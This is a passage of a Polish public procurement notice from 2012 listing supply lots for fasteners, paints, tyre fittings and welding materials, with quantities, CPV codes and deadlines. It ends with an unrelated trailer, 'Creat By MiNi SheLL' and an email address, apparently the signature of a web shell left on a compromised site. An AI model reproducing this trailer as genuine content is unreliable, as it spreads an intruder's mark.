32.	Śruba M12x60	z gwintem pełnym	kg	2
33.	Śruba M12x90	z gwintem pełnym	kg	2
34.	Śruba M14x45	z gwintem pełnym	kg	2
35.	Śruba M14x60	z gwintem pełnym	kg	2
36.	Śruba M14x90	z gwintem pełnym	kg	2
37.	Śruba M16x50	z gwintem pełnym	kg	2
38.	Śruba M16x70	z gwintem pełnym	kg	2
39.	Nakrętka sześciokątna stalowa  M5		kg	5
40.	Nakrętka sześciokątna stalowa  M 6		kg.	5
41.	Nakrętka sześciokątna stalowa  M 8		kg.	10
42.	Nakrętka sześciokątna stalowa  M 10		kg.	10
43.	Nakrętka sześciokątna stalowa  M 12		kg.	10
44.	Nakrętka sześciokątna stalowa  M 14		kg.	5
45.	Nakrętka sześciokątna stalowa  M 15		kg.	3
46.	Nakrętka sześciokątna stalowa  M 16		kg.	5
47.	Nakrętka sześciokątna stalowa  M 18		kg.	4
48.	Nakrętka sześciokątna stalowa  M 20		kg.	4
49.	Podkładka zwykła do śruby o 6 mm		kg	5
50.	Podkładka zwykła do śruby o 8 mm		kg.	5
51.	Podkładka zwykła do śruby o 10 mm		kg.	5
52.	Podkładka zwykła do śruby o 12 mm		kg.	5
53.	Podkładka zwykła do śruby o 14 mm		kg.	5
54.	Podkładka zwykła do śruby o 16 mm		kg.	3
55.	Podkładka zwykła do śruby o 18 mm		kg.	3
56.	Podkładka zwykła do śruby o 20 mm		kg.	3
57.	Podkładka sprężysta do śruby o 6 mm		kg.	5
58.	Podkładka sprężysta do śruby o 8 mm		kg.	5
59.	Podkładka sprężysta do śruby o 10 mm		kg.	5
60.	Podkładka sprężysta do śruby o 12 mm		kg.	3
61.	Podkładka sprężysta do śruby o 14 mm		kg.	3
62.	Podkładka sprężysta do śruby o 16 mm		kg.	3
63.	Podkładka sprężysta do śruby o 6 mm		kg.	3
64.	Podkładka sprężysta do śruby o 6 mm		kg.	3
65.	Zawleczka o 3,2x50		kg.	1
66.	Zawleczka o 3,2x32		kg.	1
67.	Zawleczka o 3,2x40		kg.	1
68.	Zawleczka o 4,4x45		kg.	1
69.	Smarowniczka prosta M6		szt.	100
70.	Smarowniczka prosta M8		szt.	100
71.	Smarowniczka prosta M10		szt.	100
72.	Smarowniczka kątowa M8x90		szt.	100
73.	Smarowniczka kątowa M8x45		szt.	100
74.	Smarowniczka kątowa M10x45		szt.	100
75.	Uszczelka miedziana o 8 mm		szt.	100
76.	Uszczelka miedziana o 10 mm		szt.	100
77.	Uszczelka miedziana o 12 mm		szt.	100
78.	Uszczelka miedziana o 14 mm		szt.	100
79.	Uszczelka miedziana o 16 mm		szt.	100
80.	Uszczelka miedziana o 22 mm		szt.	100
81.	Opaska zaciskowa plastikowa 16-2,5		szt.	500
82.	Opaska zaciskowa plastikowa 20-3,6		szt.	500
83.	Opaska zaciskowa plastikowa 30-3,6		szt.	300
84.	Opaska zaciskowa plastikowa 43-4,8		szt.	300
85.	Opaska zaciskowa plastikowa 33-4,8		szt.	300
86.	Opaska zaciskowa  8-12-7,5		szt.	100
87.	Opaska zaciskowa  8-16-7,5		szt.	100
88.	Opaska zaciskowa  10-16-7,5		szt.	100
89.	Opaska zaciskowa  12-22-7,5		szt.	100
90.	Rurka termokurczliwa fi 2	Długość 1 m	szt.	50
91.	Zestaw oringów gumowych	zestaw 3-24 mm, 1050 elementów, o symbolu A 09644681	szt.	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.53.15.10-9, 44.53.16.00-7, 44.53.22.00-0, 44.31.64.00-2, 44.42.50.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa materiałów malarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 7 - Dostawa materiałów malarskich

Lp.	Nazwa materiału	Opis przedmiotu zamówienia	j.m.	Ilość dostawy
1. 	Emalia nitro biała	opakowanie 1 l	l.	10
2. 	Emalia nitro khaki	opakowanie 10 l	l.	50
3. 	Emalia nitro czarna	opakowanie 1 l	l.	15
4. 	Rozpuszczalnik nitro	opakowanie 5 l	l.	50
5. 	Lakier renowacyjny pomarańczowy	opakowanie 1 l	l.	10
6. 	Rozpuszczalnik do farb chlorokauczukowych	opakowanie 1 l	l.	10
7. 	Farba chlorokauczukowa czarna	opakowanie 1 l	l.	10
8. 	Farba chlorokauczukowa niebieska	opakowanie 1 l	l.	10
9. 	Farba chlorokauczukowa biała	opakowanie 1 l	l.	10
10. 	Szpachla chemoutwardzalna	opakowanie 0,5 kg	szt.	10
11. 	Srebrzanka żaroodporna	opakowanie 0,5 l	l.	5
12. 	Farba biała w sprayu	opakowanie 0,5 l	szt.	5
13. 	Podkład ftalowy czerwony	opakowanie 1 l	l.	20
14. 	Pędzel malarski płaski	szerokość 25 mm	szt.	20
15. 	Pędzel malarski płaski	szerokość 50 mm	szt.	50
16. 	Pędzel malarski płaski	szerokość 100 mm	szt.	30
17. 	Pędzel malarski okrągły	średnica 25-30 mm	szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.81.21.00-6, 44.82.00.00-1, 44.82.00.00-4, 39.22.42.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa materiałów do ogumienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 8 - Dostawa materiałów do ogumienia

Lp.	Nazwa materiału	
Opis przedmiotu zamówienia	j.m.	Ilość dostawy
1.	Zawór opony bezdętkowej długi		szt.	50
2.	Zawór opony bezdętkowej średni		szt.	200
3.	Wkład zaworu krótki		szt.	100
4.	Ciężarek do kół  stalowych nabijany - 5 g	Opakowanie 100 szt	szt.	2
5.	Ciężarek do kół  stalowych nabijany - 10 g	Opakowanie 100 szt	szt.	2
6.	Ciężarek do kół  stalowych nabijany - 15 g	Opakowanie 100 szt	szt.	2
7.	Ciężarek do kół  stalowych nabijany - 20 g	Opakowanie 100 szt	szt.	2
8.	Ciężarek do kół  stalowych nabijany - 25 g	Opakowanie 100 szt	szt.	2
9.	Ciężarek do kół  stalowych nabijany - 30 g	Opakowanie 100 szt	szt.	2
10.	Ciężarek do kół  stalowych nabijany - 35 g	Opakowanie 50 szt	szt.	2
11.	Ciężarek do kół stalowych nabijany - 40 g	Opakowanie 50 szt	szt.	2
12.	Ciężarek do kół stalowych nabijany - 45 g	Opakowanie 50 szt	szt.	2
13.	Ciężarek do kół aluminiowych klejony	opakowanie 100 szt.,   listki 12x5 g	szt.	2
14.	Ciężarek do  kół aluminiowych nabijany - 5 g	Opakowanie 100 szt	szt.	1
15.	Ciężarek do  kół aluminiowych nabijany - 10 g	Opakowanie 100 szt	szt.	1
16.	Ciężarek do  kół aluminiowych nabijany - 15 g	Opakowanie 100 szt	szt.	1
17.	Ciężarek do  kół aluminiowych nabijany - 20 g	Opakowanie 100 szt	szt.	1
18.	Ciężarek do  kół aluminiowych nabijany - 25 g	Opakowanie 100 szt	szt.	1
19.	Ciężarek do  kół aluminiowych nabijany - 30 g	Opakowanie 100 szt	szt.	1
20.	Ciężarek do  kół aluminiowych nabijany - 35 g	Opakowanie 50 szt	szt.	1
21.	Ciężarek do  kół aluminiowych nabijany - 40 g	Opakowanie 50 szt	szt.	1
22.	Ciężarek do  kół aluminiowych nabijany - 45 g	Opakowanie 50 szt	szt.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.31.64.00-2, 37.41.31.60-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa materiałów spawalniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 9 - Dostawa materiałów spawalniczych

Lp.	Nazwa materiału	Opis przedmiotu zamówienia	j.m.
	Ilość dostawy
1.	Drut spawalniczy do migomatu 0,8 mm		kg	30
2.	Drut spawalniczy do migomatu 1 mm		kg	15
3.	Maska spawalnicza ręczna (mała)	z filtrem ochronnym 350x200 mm	szt.	2
4.	Okulary spawalnicze do spawania gazowego	z możliwością nałożenia na okulary lecznicze	szt.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.31.51.00-2, 44.31.51.00-3, 24.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com